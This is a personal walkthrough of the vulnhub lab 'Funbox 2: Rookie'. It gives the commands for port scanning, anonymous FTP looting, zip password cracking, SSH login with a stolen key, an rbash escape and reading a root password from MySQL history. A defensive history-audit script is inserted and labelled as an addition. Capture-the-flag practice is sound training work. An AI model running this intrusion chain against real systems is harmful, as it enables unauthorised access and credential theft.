Funbox 2: Rookie | vulnhub | walkthrough
This post shows how I solved Funbox: Rookie from vulnhub. It is a boot2root box, designed to be realistic. There are 3 steps to get the root shell.
1. Enumeration: nmap scan reveals service info
2. Exploitation: password cracking and ssh
3. Privilege Escalation: MySQL history file
Now let's go through the process in detail.
1. Enumeration:
21/tcp open ftp
22/tcp open ssh
80/tcp open http
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
5) Nikto scan reveals nothing but robots.txt:
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab414e93acbc, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
6) Nothing interesting in robots.txt
7) As there is nothing interesting on the web server, let's try FTP. I found that anonymous FTP login is allowed, then listed all the files:
$ ftp IP
ftp> ls -a
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 11:06 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 11:07 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
8) Can't wait to download these interesting files:
$ wget -m ftp://anonymous:anonymous@10.0.2.34
9) .@users reveals some info:
$ cat .@users
and it says:
Hi Users,
be carefull with your keys. Find them in %yourname%.zip.
The passwords are the old ones.
Regards
root
10) Those .zip files are password protected. I tried to unzip them and failed.
2. Exploitation:
11) Let's try fcrackzip to recover the zip password:
$ fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' tom.zip
It failed and showed nothing.
12) Now trying John the Ripper to get the password. But first I need to create a hash from the zip files.
14) Let's unzip a file now. Unzipping tom.zip (unzip tom.zip) gives id_rsa, which contains an SSH private key.
15) Now change the permissions of id_rsa:
$ chmod +x id_rsa
16) Log in using this private key:
$ ssh -i id_rsa tom@IP
and login failed, because ssh rejects a private key whose permissions are too open (step 17 fixes this with chmod 600).
17) Now change the private key permissions (chmod 600 id_rsa) and try ssh again. This time it succeeded.
18) After login, I tried some commands and found that rbash is running. In this LINK you will find some useful ways to bypass bash restrictions.
3. Privilege Escalation:
19) Spawning a bash shell from python solves the problem:
$ python3 -c 'import os; os.system("/bin/bash");'
20) I found .mysql_history and tried to read it.
21) The history file reveals some info, but in an encoded form, like this:
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
so I replaced the \040 escapes with spaces to make it readable:
$ sed "s/\\\040/ /g" < .mysql_history
It reveals a password!
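The same decoding, as an added audit script that is not part of the original walkthrough: it undoes every three-digit octal escape (not only \040) and flags history lines that carry a plaintext password, so a defender can check home directories for exactly this kind of leak. The sample history, the credential patterns and the scan directory are constructed assumptions.

```python
"""Decode a MySQL client history file and flag statements that leak credentials."""
import re
from pathlib import Path

# The mysql client's history stores whitespace and backslashes as three-digit
# octal escapes (space -> \040); the walkthrough's sed only undoes \040.
OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")

# Statement shapes that embed a plaintext password (assumed list; extend as needed).
CREDENTIAL_PATTERNS = (
    re.compile(r"identified\s+(?:with\s+\S+\s+)?by\s+'([^']*)'", re.IGNORECASE),
    re.compile(r"set\s+password\s*(?:for\s+\S+\s*)?=\s*(?:password\()?'([^']*)'", re.IGNORECASE),
)

def decode_history_line(line: str) -> str:
    """Turn every \\NNN octal escape back into the character it encodes."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), line)

def find_credentials(history_text: str):
    """Return (line_no, decoded_statement, secret) for each credential-bearing line."""
    hits = []
    for lineno, raw in enumerate(history_text.splitlines(), start=1):
        stmt = decode_history_line(raw)
        for pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(stmt)
            if match:
                hits.append((lineno, stmt, match.group(1)))
                break
    return hits

def scan_history_files(base_dir: str):
    """Audit every .mysql_history directly under base_dir (e.g. /home); returns {path: hits}."""
    report = {}
    for path in Path(base_dir).glob("*/.mysql_history"):
        hits = find_credentials(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample in the on-disk format shown in the walkthrough (fake passwords).
SAMPLE_HISTORY = r"""show\040databases;
quit
create\040database\040'support';
create\040database\040support;
create\040user\040'support'@'localhost'\040identified\040by\040'EXAMPLE_PASS';
set\040password\040for\040'root'@'localhost'\040=\040password('EXAMPLE_ROOT');
"""

if __name__ == "__main__":
    for lineno, stmt, secret in find_credentials(SAMPLE_HISTORY):
        print(f"line {lineno}: {stmt!r} leaks password {secret!r}")
```

Run scan_history_files("/home") as root on a host you administer to get a per-user report; an empty dict means no history file contained a matching statement.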
22) The root password is: xx11yy22!
Now I can log in as root:
$ sudo su
After changing directory (cd /root) I can now read the root flag.
Awesome! I have the root shell.